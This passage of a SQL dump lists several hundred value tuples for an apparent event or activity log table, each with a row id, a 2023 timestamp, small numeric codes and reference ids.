(6906, '2023-09-23 05:09:28', 1, 2055, 0, 1, 1),
(6907, '2023-09-23 06:11:53', 1, 2063, 0, 1, 1),
(6908, '2023-09-23 06:32:05', 1, 2058, 0, 1, 1),
(6909, '2023-09-23 06:58:36', 1, 2055, 0, 1, 1),
(6910, '2023-09-23 09:06:30', 1, 2062, 0, 1, 1),
(6911, '2023-09-23 09:38:59', 1, 2055, 0, 1, 1),
(6912, '2023-09-23 09:39:07', 1, 2064, 0, 1, 1),
(6913, '2023-09-23 09:39:10', 1, 2063, 0, 1, 1),
(6914, '2023-09-23 09:39:13', 1, 2062, 0, 1, 1),
(6915, '2023-09-23 09:39:16', 1, 2060, 0, 1, 1),
(6916, '2023-09-23 10:14:52', 1, 2062, 0, 1, 1),
(6917, '2023-09-23 10:14:53', 1, 2062, 0, 1, 1),
(6918, '2023-09-24 05:45:20', 1, 2059, 0, 1, 1),
(6919, '2023-09-24 10:37:21', 1, 2059, 0, 1, 1),
(6920, '2023-09-24 18:59:53', 1, 2059, 0, 1, 1),
(6921, '2023-09-25 00:39:56', 1, 2061, 0, 1, 1),
(6922, '2023-09-25 03:08:03', 1, 2061, 0, 1, 1),
(6923, '2023-09-25 03:14:20', 1, 2055, 0, 1, 1),
(6924, '2023-09-25 18:58:30', 1, 2064, 0, 1, 1),
(6925, '2023-09-25 21:55:36', 1, 2055, 0, 1, 1),
(6926, '2023-09-25 23:08:04', 1, 2060, 0, 1, 1),
(6927, '2023-09-26 01:54:52', 1, 2060, 0, 1, 1),
(6928, '2023-09-26 03:57:59', 1, 2064, 0, 1, 1),
(6929, '2023-09-26 06:05:38', 1, 2054, 0, 1, 1),
(6930, '2023-09-26 07:56:39', 1, 2058, 0, 1, 1),
(6931, '2023-09-26 09:16:03', 1, 2059, 0, 1, 1),
(6932, '2023-09-26 15:52:39', 1, 2054, 0, 1, 1),
(6933, '2023-09-26 22:54:44', 1, 2054, 0, 1, 1),
(6934, '2023-09-26 22:54:47', 1, 2055, 0, 1, 1),
(6935, '2023-09-26 22:55:05', 1, 2064, 0, 1, 1),
(6936, '2023-09-26 22:55:10', 1, 2063, 0, 1, 1),
(6937, '2023-09-26 22:55:11', 1, 2062, 0, 1, 1),
(6938, '2023-09-26 22:55:15', 1, 2060, 0, 1, 1),
(6939, '2023-09-26 22:55:18', 1, 2059, 0, 1, 1),
(6940, '2023-09-26 22:55:20', 1, 2061, 0, 1, 1),
(6941, '2023-09-26 22:55:22', 1, 2058, 0, 1, 1),
(6942, '2023-09-27 08:52:20', 1, 2063, 0, 1, 1),
(6943, '2023-09-27 11:39:51', 1, 2061, 0, 1, 1),
(6944, '2023-09-27 11:40:07', 1, 2064, 0, 1, 1),
(6945, '2023-09-27 14:50:48', 1, 2061, 0, 1, 1),
(6946, '2023-09-27 19:47:26', 1, 2059, 0, 1, 1),
(6947, '2023-09-27 23:30:31', 1, 2064, 0, 1, 1),
(6948, '2023-09-28 02:24:41', 1, 2063, 0, 1, 1),
(6949, '2023-09-28 02:48:45', 1, 2062, 0, 1, 1),
(6950, '2023-09-28 02:49:35', 1, 2062, 0, 1, 1),
(6951, '2023-09-28 07:02:08', 1, 2064, 0, 1, 1),
(6952, '2023-09-28 07:02:12', 1, 2054, 0, 1, 1),
(6953, '2023-09-28 07:02:16', 1, 2061, 0, 1, 1),
(6954, '2023-09-28 07:02:20', 1, 2062, 0, 1, 1),
(6955, '2023-09-28 07:02:27', 1, 2058, 0, 1, 1),
(6956, '2023-09-28 07:02:32', 1, 2060, 0, 1, 1),
(6957, '2023-09-28 07:03:43', 1, 2055, 0, 1, 1),
(6958, '2023-09-28 07:03:48', 1, 2063, 0, 1, 1),
(6959, '2023-09-28 07:03:55', 1, 2059, 0, 1, 1),
(6960, '2023-09-28 07:05:36', 1, 2060, 0, 1, 1),
(6961, '2023-09-28 07:05:48', 1, 2054, 0, 1, 1),
(6962, '2023-09-28 07:05:55', 1, 2063, 0, 1, 1),
(6963, '2023-09-28 07:06:04', 1, 2061, 0, 1, 1),
(6964, '2023-09-28 07:06:23', 1, 2064, 0, 1, 1),
(6965, '2023-09-28 07:06:34', 1, 2053, 0, 1, 1),
(6966, '2023-09-28 07:06:46', 1, 2062, 0, 1, 1),
(6967, '2023-09-28 07:06:50', 1, 2055, 0, 1, 1),
(6968, '2023-09-28 07:06:58', 1, 2059, 0, 1, 1),
(6969, '2023-09-28 07:07:01', 1, 2058, 0, 1, 1),
(6970, '2023-09-28 12:32:50', 1, 2054, 0, 1, 1),
(6971, '2023-09-28 16:45:48', 1, 2062, 0, 1, 1),
(6972, '2023-09-28 18:52:11', 1, 2059, 0, 1, 1),
(6973, '2023-09-29 00:55:28', 1, 2061, 0, 1, 1),
(6974, '2023-09-29 01:20:48', 1, 2064, 0, 1, 1),
(6975, '2023-09-29 04:15:52', 1, 2059, 0, 1, 1),
(6976, '2023-09-29 15:26:00', 1, 2059, 0, 1, 1),
(6977, '2023-09-30 00:21:24', 1, 2055, 0, 1, 1),
(6978, '2023-09-30 02:24:32', 1, 2059, 0, 1, 1),
(6979, '2023-09-30 03:55:54', 1, 2054, 0, 1, 1),
(6980, '2023-09-30 04:10:18', 1, 2054, 0, 1, 1),
(6981, '2023-09-30 04:14:59', 1, 2059, 0, 1, 1),
(6982, '2023-09-30 07:00:47', 1, 2064, 0, 1, 1),
(6983, '2023-09-30 09:27:41', 1, 2055, 0, 1, 1),
(6984, '2023-09-30 18:15:24', 1, 2061, 0, 1, 1),
(6985, '2023-10-01 00:49:15', 1, 2059, 0, 1, 1),
(6986, '2023-10-01 03:54:29', 1, 2064, 0, 1, 1),
(6987, '2023-10-01 08:59:26', 1, 2055, 0, 1, 1),
(6988, '2023-10-02 04:53:04', 1, 2064, 0, 1, 1),
(6989, '2023-10-02 06:41:17', 1, 2059, 0, 1, 1),
(6990, '2023-10-02 10:17:15', 1, 2058, 0, 1, 1),
(6991, '2023-10-03 07:38:19', 1, 2060, 0, 1, 1),
(6992, '2023-10-03 07:47:30', 1, 2063, 0, 1, 1),
(6993, '2023-10-03 08:10:34', 1, 2058, 0, 1, 1),
(6994, '2023-10-03 08:55:54', 1, 2055, 0, 1, 1),
(6995, '2023-10-03 10:22:46', 1, 2061, 0, 1, 1),
(6996, '2023-10-03 11:04:48', 1, 2062, 0, 1, 1),
(6997, '2023-10-03 12:33:22', 1, 2054, 0, 1, 1),
(6998, '2023-10-03 12:43:39', 1, 2064, 0, 1, 1),
(6999, '2023-10-03 12:51:05', 1, 2059, 0, 1, 1),
(7000, '2023-10-03 13:06:21', 1, 2064, 0, 1, 1),
(7001, '2023-10-03 16:02:20', 1, 2064, 0, 1, 1),
(7002, '2023-10-03 16:02:36', 1, 2064, 0, 1, 1),
(7003, '2023-10-03 16:02:41', 1, 2062, 0, 1, 1),
(7004, '2023-10-03 16:02:42', 1, 2059, 0, 1, 1),
(7005, '2023-10-03 16:02:44', 1, 2055, 0, 1, 1),
(7006, '2023-10-03 16:02:46', 1, 2054, 0, 1, 1),
(7007, '2023-10-03 16:02:48', 1, 2061, 0, 1, 1),
(7008, '2023-10-03 16:02:49', 1, 2063, 0, 1, 1),
(7009, '2023-10-03 16:02:50', 1, 2058, 0, 1, 1),
(7010, '2023-10-03 16:02:51', 1, 2060, 0, 1, 1),
(7011, '2023-10-03 16:04:09', 1, 2061, 0, 1, 1),
(7012, '2023-10-03 16:04:17', 1, 2055, 0, 1, 1),
(7013, '2023-10-03 16:04:20', 1, 2058, 0, 1, 1),
(7014, '2023-10-03 16:04:30', 1, 2062, 0, 1, 1),
(7015, '2023-10-03 16:04:41', 1, 2063, 0, 1, 1),
(7016, '2023-10-03 16:04:42', 1, 2060, 0, 1, 1),
(7017, '2023-10-03 16:04:47', 1, 2059, 0, 1, 1),
(7018, '2023-10-03 16:04:52', 1, 2054, 0, 1, 1),
(7019, '2023-10-03 16:04:57', 1, 2053, 0, 1, 1),
(7020, '2023-10-03 19:41:54', 1, 2060, 0, 1, 1),
(7021, '2023-10-03 19:50:50', 1, 2063, 0, 1, 1),
(7022, '2023-10-03 20:19:21', 1, 2060, 0, 1, 1),
(7023, '2023-10-03 20:28:19', 1, 2063, 0, 1, 1),
(7024, '2023-10-03 20:55:26', 1, 2060, 0, 1, 1),
(7025, '2023-10-03 21:24:12', 1, 2060, 0, 1, 1),
(7026, '2023-10-03 21:32:38', 1, 2063, 0, 1, 1),
(7027, '2023-10-03 22:03:09', 1, 2058, 0, 1, 1),
(7028, '2023-10-03 22:38:08', 1, 2055, 0, 1, 1),
(7029, '2023-10-04 00:01:39', 1, 2061, 0, 1, 1),
(7030, '2023-10-04 00:43:39', 1, 2062, 0, 1, 1),
(7031, '2023-10-04 01:55:10', 1, 2060, 0, 1, 1),
(7032, '2023-10-04 02:04:10', 1, 2063, 0, 1, 1),
(7033, '2023-10-04 02:27:05', 1, 2058, 0, 1, 1),
(7034, '2023-10-04 03:11:13', 1, 2055, 0, 1, 1),
(7035, '2023-10-04 03:50:03', 1, 2060, 0, 1, 1),
(7036, '2023-10-04 04:47:00', 1, 2061, 0, 1, 1),
(7037, '2023-10-04 05:33:14', 1, 2062, 0, 1, 1),
(7038, '2023-10-04 06:02:35', 1, 2062, 0, 1, 1),
(7039, '2023-10-04 06:04:19', 1, 2062, 0, 1, 1),
(7040, '2023-10-04 07:18:08', 1, 2054, 0, 1, 1),
(7041, '2023-10-04 07:39:41', 1, 2059, 0, 1, 1),
(7042, '2023-10-04 07:57:28', 1, 2064, 0, 1, 1),
(7043, '2023-10-04 10:07:55', 4, 2061, 1188, 1, 1),
(7044, '2023-10-04 15:19:02', 1, 2059, 0, 1, 1),
(7045, '2023-10-04 18:00:49', 1, 2059, 0, 1, 1),
(7046, '2023-10-04 20:07:48', 1, 2054, 0, 1, 1),
(7047, '2023-10-05 06:18:06', 4, 2061, 1190, 1, 1),
(7048, '2023-10-05 06:52:15', 4, 2061, 1191, 1, 1),
(7049, '2023-10-05 10:22:02', 1, 2064, 0, 1, 1),
(7050, '2023-10-05 14:11:14', 1, 2061, 0, 1, 1),
(7051, '2023-10-05 14:11:37', 1, 2061, 0, 1, 1),
(7052, '2023-10-05 14:40:05', 1, 2059, 0, 1, 1),
(7053, '2023-10-05 15:07:53', 1, 2061, 0, 1, 1),
(7054, '2023-10-05 15:08:03', 1, 2061, 0, 1, 1),
(7055, '2023-10-06 01:27:43', 1, 2061, 0, 1, 1),
(7056, '2023-10-06 02:57:45', 1, 2059, 0, 1, 1),
(7057, '2023-10-06 05:27:39', 1, 2053, 0, 1, 1),
(7058, '2023-10-06 07:55:48', 1, 2059, 0, 1, 1),
(7059, '2023-10-06 08:40:46', 1, 2054, 0, 1, 1),
(7060, '2023-10-06 14:11:13', 1, 2053, 0, 1, 1),
(7061, '2023-10-06 16:55:28', 1, 2059, 0, 1, 1),
(7062, '2023-10-06 17:16:55', 1, 2059, 0, 1, 1),
(7063, '2023-10-06 17:32:51', 1, 2054, 0, 1, 1),
(7064, '2023-10-06 18:16:53', 1, 2054, 0, 1, 1),
(7065, '2023-10-06 18:30:57', 1, 2054, 0, 1, 1),
(7066, '2023-10-06 18:59:09', 1, 2061, 0, 1, 1),
(7067, '2023-10-06 19:05:11', 1, 2059, 0, 1, 1),
(7068, '2023-10-07 06:07:11', 1, 2064, 0, 1, 1),
(7069, '2023-10-07 07:59:53', 1, 2062, 0, 1, 1),
(7070, '2023-10-07 07:59:55', 1, 2062, 0, 1, 1),
(7071, '2023-10-07 10:09:42', 1, 2059, 0, 1, 1),
(7072, '2023-10-07 18:10:56', 1, 2059, 0, 1, 1),
(7073, '2023-10-08 02:48:03', 1, 2064, 0, 1, 1),
(7074, '2023-10-08 04:50:32', 4, 2061, 1202, 1, 1),
(7075, '2023-10-08 08:05:29', 1, 2059, 0, 1, 1),
(7076, '2023-10-08 09:27:18', 1, 2059, 0, 1, 1),
(7077, '2023-10-08 13:23:55', 1, 2054, 0, 1, 1),
(7078, '2023-10-08 13:23:56', 1, 2064, 0, 1, 1),
(7079, '2023-10-08 13:23:57', 1, 2055, 0, 1, 1),
(7080, '2023-10-08 13:23:58', 1, 2059, 0, 1, 1),
(7081, '2023-10-08 13:23:58', 1, 2063, 0, 1, 1),
(7082, '2023-10-08 13:23:58', 1, 2060, 0, 1, 1),
(7083, '2023-10-08 13:23:59', 1, 2061, 0, 1, 1),
(7084, '2023-10-08 13:23:59', 1, 2062, 0, 1, 1),
(7085, '2023-10-08 13:23:59', 1, 2058, 0, 1, 1),
(7086, '2023-10-08 16:33:26', 1, 2064, 0, 1, 1),
(7087, '2023-10-08 21:40:05', 1, 2059, 0, 1, 1),
(7088, '2023-10-09 08:13:07', 1, 2063, 0, 1, 1),
(7089, '2023-10-09 09:10:00', 1, 2059, 0, 1, 1),
(7090, '2023-10-09 16:45:53', 4, 2061, 1207, 1, 1),
(7091, '2023-10-09 21:11:28', 1, 2061, 0, 1, 1),
(7092, '2023-10-10 00:09:29', 1, 2054, 0, 1, 1),
(7093, '2023-10-10 00:25:08', 1, 2059, 0, 1, 1),
(7094, '2023-10-10 03:40:50', 1, 2054, 0, 1, 1),
(7095, '2023-10-10 03:40:51', 1, 2059, 0, 1, 1),
(7096, '2023-10-10 03:40:51', 1, 2062, 0, 1, 1),
(7097, '2023-10-10 03:40:51', 1, 2064, 0, 1, 1),
(7098, '2023-10-10 03:40:51', 1, 2063, 0, 1, 1),
(7099, '2023-10-10 03:40:51', 1, 2055, 0, 1, 1),
(7100, '2023-10-10 03:40:51', 1, 2061, 0, 1, 1),
(7101, '2023-10-10 03:40:51', 1, 2058, 0, 1, 1),
(7102, '2023-10-10 03:40:51', 1, 2060, 0, 1, 1),
(7103, '2023-10-10 03:40:54', 1, 2060, 0, 1, 1),
(7104, '2023-10-10 03:40:54', 1, 2058, 0, 1, 1),
(7105, '2023-10-10 03:40:54', 1, 2064, 0, 1, 1),
(7106, '2023-10-10 05:49:13', 1, 2063, 0, 1, 1),
(7107, '2023-10-10 06:38:25', 1, 2062, 0, 1, 1),
(7108, '2023-10-10 07:06:34', 1, 2058, 0, 1, 1),
(7109, '2023-10-10 08:18:48', 1, 2062, 0, 1, 1),
(7110, '2023-10-10 12:55:35', 1, 2062, 0, 1, 1),
(7111, '2023-10-10 16:08:17', 1, 2059, 0, 1, 1),
(7112, '2023-10-10 17:56:16', 1, 2059, 0, 1, 1),
(7113, '2023-10-10 18:24:16', 1, 2063, 0, 1, 1),
(7114, '2023-10-11 02:02:44', 1, 2053, 0, 1, 1),
(7115, '2023-10-11 02:02:59', 1, 2064, 0, 1, 1),
(7116, '2023-10-11 03:29:21', 1, 2061, 0, 1, 1),
(7117, '2023-10-11 03:29:56', 1, 2061, 1217, 1, 1),
(7118, '2023-10-11 03:31:01', 1, 2061, 1217, 1, 1),
(7119, '2023-10-11 04:53:57', 1, 2059, 0, 1, 1),
(7120, '2023-10-11 07:23:00', 1, 2059, 0, 1, 1),
(7121, '2023-10-11 08:05:34', 1, 2064, 0, 1, 1),
(7122, '2023-10-11 08:05:35', 1, 2064, 0, 1, 1),
(7123, '2023-10-11 10:06:39', 1, 2060, 0, 1, 1),
(7124, '2023-10-11 10:10:30', 1, 2060, 0, 1, 1),
(7125, '2023-10-11 17:19:20', 1, 2060, 0, 1, 1),
(7126, '2023-10-11 18:25:31', 1, 2059, 0, 1, 1),
(7127, '2023-10-11 19:48:40', 1, 2063, 0, 1, 1),
(7128, '2023-10-12 06:39:26', 1, 2054, 0, 1, 1),
(7129, '2023-10-12 08:50:22', 1, 2059, 0, 1, 1),
(7130, '2023-10-12 11:32:36', 1, 2062, 0, 1, 1),
(7131, '2023-10-12 14:07:42', 1, 2053, 0, 1, 1),
(7132, '2023-10-12 16:03:19', 1, 2061, 0, 1, 1),
(7133, '2023-10-12 16:03:36', 1, 2061, 0, 1, 1),
(7134, '2023-10-12 16:15:08', 1, 2059, 0, 1, 1),
(7135, '2023-10-12 18:31:51', 1, 2059, 0, 1, 1),
(7136, '2023-10-12 19:18:56', 1, 2058, 0, 1, 1),
(7137, '2023-10-13 06:02:30', 1, 2061, 0, 1, 1),
(7138, '2023-10-13 06:47:58', 1, 2061, 0, 1, 1),
(7139, '2023-10-13 09:32:58', 1, 2059, 0, 1, 1),
(7140, '2023-10-13 10:25:36', 1, 2060, 0, 1, 1),
(7141, '2023-10-13 10:33:54', 1, 2063, 0, 1, 1),
(7142, '2023-10-13 10:54:55', 1, 2058, 0, 1, 1),
(7143, '2023-10-13 11:02:58', 1, 2059, 0, 1, 1),
(7144, '2023-10-13 11:31:27', 1, 2055, 0, 1, 1),
(7145, '2023-10-13 12:02:57', 1, 2054, 0, 1, 1),
(7146, '2023-10-13 12:42:35', 1, 2061, 0, 1, 1),
(7147, '2023-10-13 13:26:21', 1, 2062, 0, 1, 1),
(7148, '2023-10-13 14:24:42', 1, 2064, 0, 1, 1),
(7149, '2023-10-13 14:55:30', 1, 2054, 0, 1, 1),
(7150, '2023-10-13 15:13:41', 1, 2059, 0, 1, 1),
(7151, '2023-10-13 15:28:47', 1, 2064, 0, 1, 1),
(7152, '2023-10-13 16:34:51', 1, 2054, 0, 1, 1),
(7153, '2023-10-13 17:18:02', 1, 2059, 0, 1, 1),
(7154, '2023-10-13 22:14:29', 1, 2063, 0, 1, 1),
(7155, '2023-10-13 22:14:40', 1, 2063, 0, 1, 1),
(7156, '2023-10-14 05:51:03', 1, 2054, 0, 1, 1),
(7157, '2023-10-14 05:53:07', 1, 2064, 0, 1, 1),
(7158, '2023-10-14 06:21:02', 1, 2054, 0, 1, 1),
(7159, '2023-10-14 06:38:07', 1, 2064, 0, 1, 1),
(7160, '2023-10-14 07:42:51', 1, 2064, 0, 1, 1),
(7161, '2023-10-14 08:20:07', 1, 2059, 0, 1, 1),
(7162, '2023-10-14 11:20:07', 1, 2059, 0, 1, 1),
(7163, '2023-10-15 00:59:37', 1, 2063, 0, 1, 1),
(7164, '2023-10-15 04:53:31', 1, 2055, 0, 1, 1),
(7165, '2023-10-15 13:07:44', 1, 2061, 0, 1, 1),
(7166, '2023-10-15 17:41:22', 1, 2062, 0, 1, 1),
(7167, '2023-10-15 18:37:25', 1, 2064, 0, 1, 1),
(7168, '2023-10-15 19:13:22', 1, 2059, 0, 1, 1),
(7169, '2023-10-15 23:47:38', 1, 2059, 0, 1, 1),
(7170, '2023-10-15 23:47:38', 1, 2063, 0, 1, 1),
(7171, '2023-10-15 23:47:38', 1, 2060, 0, 1, 1),
(7172, '2023-10-15 23:47:38', 1, 2064, 0, 1, 1),
(7173, '2023-10-15 23:47:38', 1, 2055, 0, 1, 1),
(7174, '2023-10-15 23:47:38', 1, 2061, 0, 1, 1),
(7175, '2023-10-15 23:47:38', 1, 2054, 0, 1, 1),
(7176, '2023-10-15 23:47:38', 1, 2058, 0, 1, 1),
(7177, '2023-10-15 23:47:38', 1, 2062, 0, 1, 1),
(7178, '2023-10-15 23:47:45', 1, 2054, 0, 1, 1),
(7179, '2023-10-15 23:47:45', 1, 2064, 0, 1, 1),
(7180, '2023-10-15 23:47:45', 1, 2055, 0, 1, 1),
(7181, '2023-10-15 23:47:45', 1, 2063, 0, 1, 1),
(7182, '2023-10-15 23:47:46', 1, 2062, 0, 1, 1),
(7183, '2023-10-15 23:47:46', 1, 2060, 0, 1, 1),
(7184, '2023-10-15 23:47:46', 1, 2059, 0, 1, 1),
(7185, '2023-10-15 23:47:47', 1, 2061, 0, 1, 1),
(7186, '2023-10-15 23:47:47', 1, 2058, 0, 1, 1),
(7187, '2023-10-16 03:16:28', 1, 2061, 0, 1, 1),
(7188, '2023-10-16 03:16:28', 1, 2055, 0, 1, 1),
(7189, '2023-10-16 03:16:28', 1, 2059, 0, 1, 1),
(7190, '2023-10-16 03:16:28', 1, 2054, 0, 1, 1),
(7191, '2023-10-16 03:16:29', 1, 2064, 0, 1, 1),
(7192, '2023-10-16 03:16:32', 1, 2062, 0, 1, 1),
(7193, '2023-10-16 03:16:33', 1, 2063, 0, 1, 1),
(7194, '2023-10-16 03:16:34', 1, 2060, 0, 1, 1),
(7195, '2023-10-16 03:16:35', 1, 2058, 0, 1, 1),
(7196, '2023-10-16 06:50:29', 1, 2055, 0, 1, 1),
(7197, '2023-10-16 08:48:44', 1, 2059, 0, 1, 1),
(7198, '2023-10-16 09:23:50', 1, 2063, 0, 1, 1),
(7199, '2023-10-16 10:07:44', 1, 2061, 0, 1, 1),
(7200, '2023-10-16 16:28:14', 1, 2061, 0, 1, 1),
(7201, '2023-10-16 16:39:00', 1, 2060, 0, 1, 1),
(7202, '2023-10-16 16:53:34', 1, 2064, 0, 1, 1),
(7203, '2023-10-16 17:38:34', 1, 2064, 0, 1, 1),
(7204, '2023-10-16 17:38:49', 1, 2064, 0, 1, 1),
(7205, '2023-10-16 17:59:37', 1, 2059, 0, 1, 1),
(7206, '2023-10-16 18:48:25', 1, 2063, 0, 1, 1),
(7207, '2023-10-16 19:13:20', 1, 2054, 0, 1, 1),
(7208, '2023-10-17 00:18:32', 1, 2059, 0, 1, 1),
(7209, '2023-10-17 02:47:09', 1, 2062, 0, 1, 1),
(7210, '2023-10-17 02:48:47', 1, 2055, 0, 1, 1),
(7211, '2023-10-17 03:33:43', 1, 2058, 0, 1, 1),
(7212, '2023-10-17 06:18:32', 1, 2064, 0, 1, 1),
(7213, '2023-10-17 16:32:16', 1, 2063, 0, 1, 1),
(7214, '2023-10-17 16:37:49', 1, 2064, 0, 1, 1),
(7215, '2023-10-17 16:48:49', 1, 2064, 0, 1, 1),
(7216, '2023-10-17 19:20:48', 1, 2059, 0, 1, 1),
(7217, '2023-10-18 01:57:15', 1, 2062, 0, 1, 1),
(7218, '2023-10-18 03:31:15', 1, 2064, 0, 1, 1),
(7219, '2023-10-18 03:31:21', 1, 2063, 0, 1, 1),
(7220, '2023-10-18 03:31:25', 1, 2062, 0, 1, 1),
(7221, '2023-10-18 03:31:29', 1, 2061, 0, 1, 1),
(7222, '2023-10-18 03:31:33', 1, 2060, 0, 1, 1),
(7223, '2023-10-18 03:31:37', 1, 2059, 0, 1, 1),
(7224, '2023-10-18 03:31:41', 1, 2058, 0, 1, 1),
(7225, '2023-10-18 03:31:45', 1, 2055, 0, 1, 1),
(7226, '2023-10-18 03:31:49', 1, 2054, 0, 1, 1),
(7227, '2023-10-18 03:36:15', 1, 2053, 0, 1, 1),
(7228, '2023-10-18 07:18:52', 1, 2059, 0, 1, 1),
(7229, '2023-10-18 09:52:04', 1, 2058, 0, 1, 1),
(7230, '2023-10-18 09:57:59', 1, 2064, 0, 1, 1),
(7231, '2023-10-18 09:58:10', 1, 2064, 0, 1, 1),
(7232, '2023-10-18 14:00:24', 1, 2054, 0, 1, 1),
(7233, '2023-10-18 16:59:54', 1, 2059, 0, 1, 1),
(7234, '2023-10-18 16:59:56', 1, 2059, 0, 1, 1),
(7235, '2023-10-18 16:59:58', 1, 2059, 0, 1, 1),
(7236, '2023-10-18 23:23:28', 1, 2059, 0, 1, 1),
(7237, '2023-10-19 02:07:13', 1, 2062, 0, 1, 1),
(7238, '2023-10-19 04:07:27', 1, 2061, 0, 1, 1),
(7239, '2023-10-19 04:07:36', 1, 2061, 0, 1, 1),
(7240, '2023-10-19 04:22:11', 4, 2064, 1245, 1, 1),
(7241, '2023-10-19 04:23:11', 4, 2061, 1245, 1, 1),
(7242, '2023-10-19 04:24:08', 4, 2058, 1245, 1, 1),
(7243, '2023-10-19 04:25:09', 4, 2055, 1245, 1, 1),
(7244, '2023-10-19 04:26:12', 4, 2063, 1245, 1, 1),
(7245, '2023-10-19 04:27:15', 4, 2062, 1245, 1, 1),
(7246, '2023-10-19 04:27:22', 1, 2061, 1245, 1, 1),
(7247, '2023-10-19 04:27:26', 1, 2061, 1245, 1, 1),
(7248, '2023-10-19 04:27:27', 1, 2061, 1245, 1, 1),
(7249, '2023-10-19 04:27:29', 1, 2061, 1245, 1, 1),
(7250, '2023-10-19 04:27:32', 1, 2061, 1245, 1, 1),
(7251, '2023-10-19 04:27:33', 1, 2061, 1245, 1, 1),
(7252, '2023-10-19 04:27:35', 1, 2061, 1245, 1, 1),
(7253, '2023-10-19 04:27:36', 1, 2061, 1245, 1, 1),
(7254, '2023-10-19 04:27:38', 1, 2061, 1245, 1, 1),
(7255, '2023-10-19 04:27:39', 1, 2061, 1245, 1, 1),
(7256, '2023-10-19 04:27:40', 1, 2061, 1245, 1, 1),
(7257, '2023-10-19 04:27:43', 1, 2061, 1245, 1, 1),
(7258, '2023-10-19 04:27:46', 1, 2061, 1245, 1, 1),
(7259, '2023-10-19 04:27:48', 1, 2061, 1245, 1, 1),
(7260, '2023-10-19 04:27:50', 1, 2061, 1245, 1, 1),
(7261, '2023-10-19 04:27:51', 1, 2061, 1245, 1, 1),
(7262, '2023-10-19 04:27:54', 1, 2061, 1245, 1, 1),
(7263, '2023-10-19 04:27:55', 1, 2061, 1245, 1, 1),
(7264, '2023-10-19 04:27:58', 1, 2061, 1245, 1, 1),
(7265, '2023-10-19 04:28:52', 4, 2060, 1245, 1, 1),
(7266, '2023-10-19 04:29:00', 1, 2059, 1245, 1, 1),
(7267, '2023-10-19 04:29:06', 1, 2059, 1245, 1, 1),
(7268, '2023-10-19 04:29:07', 1, 2059, 1245, 1, 1),
(7269, '2023-10-19 04:29:08', 1, 2059, 1245, 1, 1),
(7270, '2023-10-19 04:29:13', 1, 2059, 1245, 1, 1),
(7271, '2023-10-19 04:29:14', 1, 2059, 1245, 1, 1),
(7272, '2023-10-19 04:29:16', 1, 2059, 1245, 1, 1),
(7273, '2023-10-19 04:29:20', 1, 2059, 1245, 1, 1),
(7274, '2023-10-19 04:29:21', 1, 2059, 1245, 1, 1),
(7275, '2023-10-19 04:29:23', 1, 2064, 1245, 1, 1),
(7276, '2023-10-19 04:29:26', 1, 2059, 1245, 1, 1),
(7277, '2023-10-19 04:29:27', 1, 2064, 1245, 1, 1),
(7278, '2023-10-19 04:29:29', 1, 2064, 1245, 1, 1),
(7279, '2023-10-19 04:29:32', 1, 2064, 1245, 1, 1),
(7280, '2023-10-19 04:29:34', 1, 2064, 1245, 1, 1),
(7281, '2023-10-19 04:29:35', 1, 2064, 1245, 1, 1),
(7282, '2023-10-19 04:29:36', 1, 2059, 1245, 1, 1),
(7283, '2023-10-19 04:29:37', 1, 2064, 1245, 1, 1),
(7284, '2023-10-19 04:29:39', 1, 2064, 1245, 1, 1),
(7285, '2023-10-19 04:29:40', 1, 2059, 1245, 1, 1),
(7286, '2023-10-19 04:29:42', 1, 2064, 1245, 1, 1),
(7287, '2023-10-19 04:29:45', 1, 2059, 1245, 1, 1),
(7288, '2023-10-19 04:29:46', 1, 2064, 1245, 1, 1),
(7289, '2023-10-19 04:29:49', 1, 2059, 1245, 1, 1),
(7290, '2023-10-19 04:29:50', 1, 2064, 1245, 1, 1),
(7291, '2023-10-19 04:29:52', 1, 2064, 1245, 1, 1),
(7292, '2023-10-19 04:29:53', 1, 2059, 1245, 1, 1),
(7293, '2023-10-19 04:29:56', 1, 2064, 1245, 1, 1),
(7294, '2023-10-19 04:29:58', 1, 2059, 1245, 1, 1),
(7295, '2023-10-19 04:30:00', 1, 2064, 1245, 1, 1),
(7296, '2023-10-19 04:30:01', 1, 2059, 1245, 1, 1),
(7297, '2023-10-19 04:30:04', 1, 2059, 1245, 1, 1),
(7298, '2023-10-19 04:30:05', 1, 2064, 1245, 1, 1),
(7299, '2023-10-19 04:30:07', 1, 2064, 1245, 1, 1),
(7300, '2023-10-19 04:30:08', 1, 2059, 1245, 1, 1),
(7301, '2023-10-19 04:30:11', 1, 2064, 1245, 1, 1),
(7302, '2023-10-19 04:30:13', 1, 2064, 1245, 1, 1),
(7303, '2023-10-19 04:30:17', 1, 2064, 1245, 1, 1),
(7304, '2023-10-19 04:30:54', 1, 2063, 1245, 1, 1),
(7305, '2023-10-19 04:30:57', 1, 2063, 1245, 1, 1),
(7306, '2023-10-19 04:30:58', 1, 2063, 1245, 1, 1),
(7307, '2023-10-19 04:31:01', 1, 2063, 1245, 1, 1),
(7308, '2023-10-19 04:31:02', 1, 2063, 1245, 1, 1),
(7309, '2023-10-19 04:31:03', 1, 2063, 1245, 1, 1),
(7310, '2023-10-19 04:31:04', 1, 2063, 1245, 1, 1),
(7311, '2023-10-19 04:31:05', 1, 2063, 1245, 1, 1),
(7312, '2023-10-19 04:31:07', 1, 2063, 1245, 1, 1),
(7313, '2023-10-19 04:31:08', 1, 2063, 1245, 1, 1),
(7314, '2023-10-19 04:31:10', 1, 2063, 1245, 1, 1),
(7315, '2023-10-19 04:31:11', 1, 2058, 1245, 1, 1),
(7316, '2023-10-19 04:31:13', 1, 2063, 1245, 1, 1),
(7317, '2023-10-19 04:31:14', 1, 2058, 1245, 1, 1),
(7318, '2023-10-19 04:31:15', 1, 2058, 1245, 1, 1),
(7319, '2023-10-19 04:31:17', 1, 2058, 1245, 1, 1),
(7320, '2023-10-19 04:31:18', 1, 2058, 1245, 1, 1),
(7321, '2023-10-19 04:31:19', 1, 2058, 1245, 1, 1),
(7322, '2023-10-19 04:31:21', 1, 2058, 1245, 1, 1),
(7323, '2023-10-19 04:31:22', 1, 2058, 1245, 1, 1),
(7324, '2023-10-19 04:31:23', 1, 2058, 1245, 1, 1),
(7325, '2023-10-19 04:31:24', 1, 2063, 1245, 1, 1),
(7326, '2023-10-19 04:31:25', 1, 2058, 1245, 1, 1),
(7327, '2023-10-19 04:31:26', 1, 2063, 1245, 1, 1),
(7328, '2023-10-19 04:31:27', 1, 2058, 1245, 1, 1),
(7329, '2023-10-19 04:31:28', 1, 2063, 1245, 1, 1),
(7330, '2023-10-19 04:31:29', 1, 2058, 1245, 1, 1),
